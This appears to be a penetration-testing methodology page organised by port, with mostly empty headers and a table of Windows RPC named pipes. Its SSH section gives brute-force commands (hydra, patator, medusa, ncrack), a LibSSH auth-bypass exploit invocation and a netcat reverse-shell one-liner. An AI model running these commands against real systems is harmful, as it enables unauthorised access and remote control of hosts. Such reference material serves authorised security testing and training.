Edit

Ports

General

AIO Penetration Testing Methodology - 0DAYsecurity.com

Port 21 - FTP

nmap --script ftp-* -p 21 10.11.1.111

Port 22 - SSH

  • If you have usernames test login with username:username

  • Vulnerable Versions to user enum: <7.7

# Enum SSH
# Get version
nmap 10.11.1.1 -p22 -sV
# Get banner
nc 10.11.1.1 22
# Get login banner
ssh [email protected]
# Get algorythms supporteed
nmap -p22 10.11.1.1 --script ssh2-enum-algos
# Check weak keys
nmap-p22 10.2.1.1 --script ssh-hostkey --script-args ssh_hostkey=full
# Check auth methods
nmap -p22 10.11.1.1 --script ssh-auth-methods --script-args="ssh.user=admin"

# User can ask to execute a command right after authentication before it’s default command or shell is executed
$ ssh -v [email protected] id
...
Password:
debug1: Authentication succeeded (keyboard-interactive).
Authenticated to 10.10.1.111 ([10.10.1.1114]:22).
debug1: channel 0: new [client-session]
debug1: Requesting [email protected]
debug1: Entering interactive session.
debug1: pledge: network
debug1: client_input_global_request: rtype [email protected] want_reply 0
debug1: Sending command: id
debug1: client_input_channel_req: channel 0 rtype exit-status reply 0
debug1: client_input_channel_req: channel 0 rtype [email protected] reply 0
uid=1000(user) gid=100(users) groups=100(users)
debug1: channel 0: free: client-session, nchannels 1
Transferred: sent 2412, received 2480 bytes, in 0.1 seconds
Bytes per second: sent 43133.4, received 44349.5
debug1: Exit status 0

# Check Auth Methods:
$ ssh -v 10.10.1.111
OpenSSH_8.1p1, OpenSSL 1.1.1d  10 Sep 2019
...
debug1: Authentications that can continue: publickey,password,keyboard-interactive

# Force Auth Method:
$ ssh -v 10.10.1.111 -o PreferredAuthentications=password
...
debug1: Next authentication method: password

# BruteForce:
patator ssh_login host=10.11.1.111 port=22 user=root 0=/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt password=FILE0 -x ignore:mesg='Authentication failed.'
hydra -l user -P /usr/share/wordlists/password/rockyou.txt -e s ssh://10.10.1.111
medusa -h 10.10.1.111 -u user -P /usr/share/wordlists/password/rockyou.txt -e s -M ssh
ncrack --user user -P /usr/share/wordlists/password/rockyou.txt ssh://10.10.1.111

# LibSSH Before 0.7.6 and 0.8.4 - LibSSH 0.7.6 / 0.8.4 - Unauthorized Access 
# Id
python /usr/share/exploitdb/exploits/linux/remote/46307.py 10.10.1.111 22 id
# Reverse
python /usr/share/exploitdb/exploits/linux/remote/46307.py 10.10.1.111 22 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.1.111 80 >/tmp/f"

# SSH FUZZ
# https://dl.packetstormsecurity.net/fuzzer/sshfuzz.txt

# cpan Net::SSH2
./sshfuzz.pl -H 10.10.1.111 -P 22 -u user -p user

use auxiliary/fuzzers/ssh/ssh_version_2

# SSH-AUDIT
# https://github.com/arthepsy/ssh-audit                     

# Enum users < 7.7:
# https://www.exploit-db.com/exploits/45233
https://github.com/CaioCGH/EP4-redes/blob/master/attacker/sshUsernameEnumExploit.py
python ssh_user_enum.py --port 2223 --userList /root/Downloads/users.txt IP 2>/dev/null | grep "is a"

# SSH Leaks:
https://shhgit.darkport.co.uk/

# SSH bruteforce
# https://github.com/kitabisa/ssb

Port 23 - Telnet

Port 25 - SMTP

Port 43 - Whois

Port 53 - DNS

Port 69 - UDP - TFTP

  • Vulns tftp in server 1.3, 1.4, 1.9, 2.1, and a few more.

  • Same checks as FTP Port 21.

Port 79 - Finger

Port 88 - Kerberos

Check Kerberos dedicated section

Port 110 - Pop3

Port 111 - Rpcbind

Port 135 - MSRPC

Some versions are vulnerable.

Named pipe

Description

Service or process

Interface identifier

atsvc

atsvc interface (Scheduler service)

mstask.exe

1ff70682-0a51-30e8-076d-740be8cee98b v1.0

AudioSrv

AudioSrv interface (Windows Audio service)

AudioSrv

3faf4738-3a21-4307-b46c-fdda9bb8c0d5 v1.0

browser (ntsvcs alias)

browser interface (Computer Browser service)

Browser

6bffd098-a112-3610-9833-012892020162 v0.0

cert

ICertPassage interface (Certificate services)

certsrv.exe

91ae6020-9e3c-11cf-8d7c-00aa00c091be v0.0

Ctx_Winstation_API_Service

winstation_rpc interface

termsrv.exe

5ca4a760-ebb1-11cf-8611-00a0245420ed v1.0

DAV RPC SERVICE

davclntrpc interface (WebDAV client service)

WebClient

c8cb7687-e6d3-11d2-a958-00c04f682e16 v1.0

dnsserver

DnsServer interface (DNS Server service)

dns.exe

50abc2a4-574d-40b3-9d66-ee4fd5fba076 v5.0

epmapper

epmp interface (RPC endpoint mapper)

RpcSs

e1af8308-5d1f-11c9-91a4-08002b14a0fa v3.0

eventlog (ntsvcs alias)

eventlog interface (Eventlog service)

Eventlog

82273fdc-e32a-18c3-3f78-827929dc23ea v0.0

HydraLsPipe

Terminal Server Licensing

lserver.exe

3d267954-eeb7-11d1-b94e-00c04fa3080d v1.0

InitShutdown

InitShutdown interface

winlogon.exe

894de0c0-0d55-11d3-a322-00c04fa321a1 v1.0

keysvc

IKeySvc interface (Cryptographic services)

CryptSvc

8d0ffe72-d252-11d0-bf8f-00c04fd9126b v1.0

keysvc

ICertProtect interface (Cryptographic services)

CryptSvc

0d72a7d4-6148-11d1-b4aa-00c04fb66ea0 v1.0

locator

NsiS interface (RPC Locator service)

locator.exe

d6d70ef0-0e3b-11cb-acc3-08002b1d29c4 v1.0

llsrpc

llsrpc interface (Licensing Logging service)

llssrv.exe

342cfd40-3c6c-11ce-a893-08002b2e9c6d v0.0

lsarpc (lsass alias)

lsarpc interface

lsass.exe

12345778-1234-abcd-ef00-0123456789ab v0.0

lsarpc (lsass alias)

dssetup interface

lsass.exe

3919286a-b10c-11d0-9ba8-00c04fd92ef5 v0.0

msgsvc (ntsvcs alias)

msgsvcsend interface (Messenger service)

messenger

5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0

nddeapi

nddeapi interface (NetDDE service)

netdde.exe

2f5f3220-c126-1076-b549-074d078619da v1.2

netdfs

netdfs interface (Distributed File System service)

Dfssvc

4fc742e0-4a10-11cf-8273-00aa004ae673 v3.0

netlogon (lsass alias)

netlogon interface (Net Logon service)

Netlogon

12345678-1234-abcd-ef00-01234567cffb v1.0

ntsvcs

pnp interface (Plug and Play service)

PlugPlay

8d9f4e40-a03d-11ce-8f69-08003e30051b v1.0

plugplay

pnp interface (Plug and Play Windows Vista service)

PlugPlay

8d9f4e40-a03d-11ce-8f69-08003e30051b v1.0

policyagent

PolicyAgent interface (IPSEC Policy Agent (Windows 2000))

PolicyAgent

d335b8f6-cb31-11d0-b0f9-006097ba4e54 v1.5

ipsec

winipsec interface (IPsec Services)

PolicyAgent

12345678-1234-abcd-ef00-0123456789ab v1.0

ProfMapApi

pmapapi interface

winlogon.exe

369ce4f0-0fdc-11d3-bde8-00c04f8eee78 v1.0

protected_storage

IPStoreProv interface (Protected Storage)

lsass.exe

c9378ff1-16f7-11d0-a0b2-00aa0061426a v1.0

ROUTER

Remote Access

mprdim.dll

8f09f000-b7ed-11ce-bbd2-00001a181cad v0.0

samr (lsass alias)

samr interface

lsass.exe

12345778-1234-abcd-ef00-0123456789ac v1.0

scerpc

SceSvc

services.exe

93149ca2-973b-11d1-8c39-00c04fb984f9 v0.0

SECLOGON

ISeclogon interface (Secondary logon service)

seclogon

12b81e99-f207-4a4c-85d3-77b42f76fd14 v1.0

SfcApi

sfcapi interface (Windows File Protection)

winlogon.exe

83da7c00-e84f-11d2-9807-00c04f8ec850 v2.0

spoolss

spoolss interface (Spooler service)

spoolsv.exe

12345678-1234-abcd-ef00-0123456789ab v1.0

srvsvc (ntsvcs alias)

srvsvc interface (Server service)

services.exe (w2k) or svchost.exe (wxp and w2k3)

4b324fc8-1670-01d3-1278-5a47bf6ee188 v3.0

ssdpsrv

ssdpsrv interface (SSDP service)

ssdpsrv

4b112204-0e19-11d3-b42b-0000f81feb9f v1.0

svcctl (ntsvcs alias)

svcctl interface (Services control manager)

services.exe

367aeb81-9844-35f1-ad32-98f038001003 v2.0

tapsrv

tapsrv interface (Telephony service)

Tapisrv

2f5f6520-ca46-1067-b319-00dd010662da v1.0

trkwks

trkwks interface (Distributed Link Tracking Client)

Trkwks

300f3532-38cc-11d0-a3f0-0020af6b0add v1.2

W32TIME (ntsvcs alias)

w32time interface (Windows Time (Windows 2000 and XP))

w32time

8fb6d884-2388-11d0-8c35-00c04fda2795 v4.1

W32TIME_ALT

w32time interface (Windows Time (Windows Server 2003, Windows Vista))

w32time

8fb6d884-2388-11d0-8c35-00c04fda2795 v4.1

winlogonrpc

GetUserToken interface

winlogon.exe

a002b3a0-c9b7-11d1-ae88-0080c75e4ec1 v1.0

winreg

winreg interface (Remote registry service)

RemoteRegistry

338cd001-2244-31f1-aaaa-900038001003 v1.0

winspipe

winsif interface (WINS service)

wins.exe

45f52c28-7f9f-101a-b52b-08002b2efabe v1.0

wkssvc (ntsvcs alias)

wkssvc interface (Workstation service)

services.exe (w2k) or svchost.exe (wxp and w2k3)

6bffd098-a112-3610-9833-46c3f87e345a v1.0

Port 139/445 - SMB

Port 161/162 UDP - SNMP

Port 389,636 - LDAP

Check AD section and this LDAP guide

Port 443 - HTTPS

Read the actual SSL CERT to:

  • find out potential correct vhost to GET

  • is the clock skewed

  • any names that could be usernames for bruteforce/guessing.

Port 500 - ISAKMP IKE

Port 513 - Rlogin

Port 541 - FortiNet SSLVPN

Fortinet Ports Guide

SSL VPN Leak

Port 1433 - MSSQL

Port 1521 - Oracle

Port 2000 - Cisco sccp

Port 2049 - NFS

Port 2100 - Oracle XML DB

Default passwords:

https://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm

Port 3306 - MySQL

Port 3389 - RDP

Port 5432 - PostgreSQL

Port 5900 - VNC

Port 5984 - CouchDB

Port 5985 - WinRM

Port 6379 - Redis

Port 8172 - MsDeploy

Port 5601/9200

ELK

Port 27017-19/27080/28017 - MongoDB

MongoDB

Unknown ports

  • amap -d 10.11.1.111 8000

  • netcat: makes connections to ports. Can echo strings or give shells: nc -nv 10.11.1.111 110

  • sfuzz: can connect to ports, udp or tcp, refrain from closing a connection, using basic HTTP configurations

RCE ports

PreviousSSL/TLSNextWeb Attacks

Last updated

Was this helpful?